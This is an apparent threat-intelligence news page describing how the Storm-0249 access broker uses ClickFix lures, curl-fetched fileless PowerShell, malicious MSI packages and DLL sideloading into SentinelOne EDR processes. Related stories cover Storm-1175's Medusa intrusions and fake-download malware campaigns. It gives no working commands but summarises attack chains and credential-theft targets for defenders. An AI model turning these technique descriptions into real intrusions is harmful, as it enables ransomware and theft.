Storm-0249 Uses EDR Abuse and ClickFix for Stealthy Ransomware Deployment
Storm-0249, an initial access broker previously known for selling access to compromised networks, has adopted advanced techniques to facilitate ransomware attacks. The group now leverages social engineering tactics such as ClickFix, which tricks users into executing malicious commands via the Windows Run dialog. These commands use legitimate utilities like curl.exe to download and execute fileless PowerShell scripts from spoofed Microsoft domains, ultimately deploying malicious MSI packages with SYSTEM privileges. The attack chain includes DLL sideloading, where a trojanized DLL is placed alongside legitimate EDR components (notably SentinelOne's SentinelAgentWorker.exe), allowing the attacker's code to run within trusted processes and evade detection. Once persistence is established, Storm-0249 abuses EDR tools to collect system information and maintain stealthy access, making detection and remediation challenging for defenders.
This evolution in Storm-0249's tactics demonstrates a shift from mass phishing to highly targeted, stealthy operations that exploit trusted security software for malicious purposes. The abuse of EDR solutions not only enables the bypassing of traditional security controls but also provides a reliable foothold for ransomware deployment. Security researchers recommend implementing robust email filtering, monitoring for unusual use of legitimate utilities, and updating detection rules to identify these advanced techniques. Organizations are urged to review their EDR configurations and monitor for signs of DLL sideloading and unauthorized PowerShell activity to mitigate the risk posed by this threat actor.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Researchers warn EDR abuse technique could spread beyond SentinelOne
Security reporting highlighted that Storm-0249's use of trusted EDR components and Windows utilities is adaptable to other endpoint security products, raising concern that similar stealth techniques may be adopted more broadly. Defenders were urged to rely more on behavioral detection, baselining, DNS monitoring, and tighter controls on LoLBins and scripting tools.
Researchers reveal Storm-0249 collects system IDs for ransomware deployment
Analysis of the intrusion chain showed the attacker harvesting identifiers such as MachineGuid and other hardware-linked values from compromised systems. These identifiers are used to profile victims and support ransomware deployment workflows, including binding encryption to specific machines.
Storm-0249 abuses SentinelOne EDR via DLL sideloading and fileless PowerShell
In attacks analyzed by ReliaQuest, Storm-0249 used malicious curl commands, an MSI installer, in-memory PowerShell, and DLL sideloading to execute malware through trusted SentinelOne processes and evade detection. The activity established persistence and encrypted command-and-control while blending into legitimate system activity.
Storm-0249 shifts from broad phishing to targeted intrusion tactics
Storm-0249 evolved from broad phishing campaigns to more targeted attacks using domain spoofing, ClickFix-style social engineering, and living-off-the-land techniques to gain initial access for ransomware operations. Multiple reports describe this as a tactical escalation in how the group operates.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Storm-0249 Abuses EDR Processes in Stealthy Attacks
darkreading.com
Open sourceStorm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading
thehackernews.com
Open sourceRansomware IAB abuses EDR for stealthy malware execution
bleepingcomputer.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Storm-0249 Abuses EDR DLL Sideloading for Stealthy Ransomware Access
Storm-0249, previously known for mass phishing campaigns, has evolved into a sophisticated initial access broker employing advanced evasion techniques. The group now leverages legitimate, digitally signed files associated with endpoint detection and response (EDR) tools—such as SentinelOne—by abusing DLL sideloading to establish persistent, covert access within targeted networks. This method allows Storm-0249 to remain undetected for extended periods, conduct reconnaissance, and prepare for ransomware deployment, often selling this pre-staged access to ransomware-as-a-service affiliates. The attack chain typically begins with social engineering tactics like ClickFix, which manipulates users into executing malicious commands, followed by the deployment of malicious MSI packages with system-level privileges. Security researchers have highlighted the growing trend among initial access brokers to adopt such stealthy post-exploitation techniques, which accelerate attack timelines and lower technical barriers for downstream threat actors. The abuse of trusted EDR processes through DLL sideloading is particularly concerning, as it exploits the inherent trust in security software to cloak malicious activity and facilitate ransomware operations. Organizations are urged to monitor for unusual activity involving EDR processes and to scrutinize the integrity of signed executables within their environments.
Mar 21, 2026
Storm-1175 Rapidly Exploits Web-Facing Flaws to Deploy Medusa Ransomware
Microsoft said threat actor **Storm-1175** is running high-tempo intrusions that exploit newly disclosed and, in some cases, previously unknown vulnerabilities in internet-facing systems to steal data and deploy **Medusa ransomware** within days or even 24 hours. The financially motivated group has heavily impacted healthcare organizations and also targeted education, professional services, and finance in Australia, the United Kingdom, and the United States. Since 2023, the actor has exploited more than 16 flaws across products including **Microsoft Exchange**, **PaperCut**, **Ivanti**, **ConnectWise ScreenConnect**, **JetBrains TeamCity**, **SimpleHelp**, **CrushFTP**, **GoAnywhere MFT**, **SmarterMail**, **SAP NetWeaver**, and **BeyondTrust**, with Microsoft also observing zero-day use against SmarterMail and GoAnywhere before public disclosure. After gaining access, Storm-1175 establishes persistence with new administrator accounts, web shells, and remote management tools, then moves laterally using LOLBins, **Impacket**, **PDQ Deployer**, and Cloudflare tunnels while stealing credentials from **LSASS**, `NTDS.dit`, `SAM`, and backup systems. Microsoft said the actor tampers with Microsoft Defender settings to reduce detection, uses **Bandizip** and **Rclone** for collection and exfiltration, and deploys Medusa through PDQ Deployer or Group Policy; the group has also shown interest in Linux targets such as vulnerable **Oracle WebLogic** servers. Microsoft urged organizations to reduce exposure of web-facing assets, patch quickly, enforce MFA on approved RMM tools, restrict local administrator rights, and enable protections such as **Credential Guard**, tamper protection, and Defender XDR attack disruption features.
Apr 7, 2026
SEO Poisoning and Fake Software Downloads Used to Deliver Credential Theft and RAT Malware
Threat actors are using **software impersonation** and **SEO poisoning** to push victims toward fake download sites for trusted enterprise and IT tools, then delivering malware through trojanized installers. In one campaign, **Storm-2561** used spoofed VPN vendor pages for products such as **Pulse Secure, Fortinet, and Ivanti** to steal enterprise VPN credentials. The malicious packages were hosted on GitHub, signed with a certificate issued to **"Taiyuan Lihua Near Information Technology Co., Ltd."**, and designed to show an error before redirecting victims to the legitimate vendor site, reducing suspicion while exfiltrating credentials. A separate but closely related campaign used fake **FileZilla** download pages to distribute a **Remote Access Trojan** through multi-stage loaders and **DLL sideloading**. Attackers bundled legitimate FileZilla software with a malicious `version.dll`, or dropped the DLL during installation so the malware would execute while the expected application appeared to install normally. Both reports describe the same broader intrusion pattern: adversaries abusing trusted brands, realistic lookalike websites, and legitimate software packaging to compromise users who believe they are downloading authentic tools. A separate **Warlock** intrusion analysis describing web shells, lateral movement, tunneling, and ransomware activity is a different incident and does not match this malware-delivery story.
Apr 26, 2026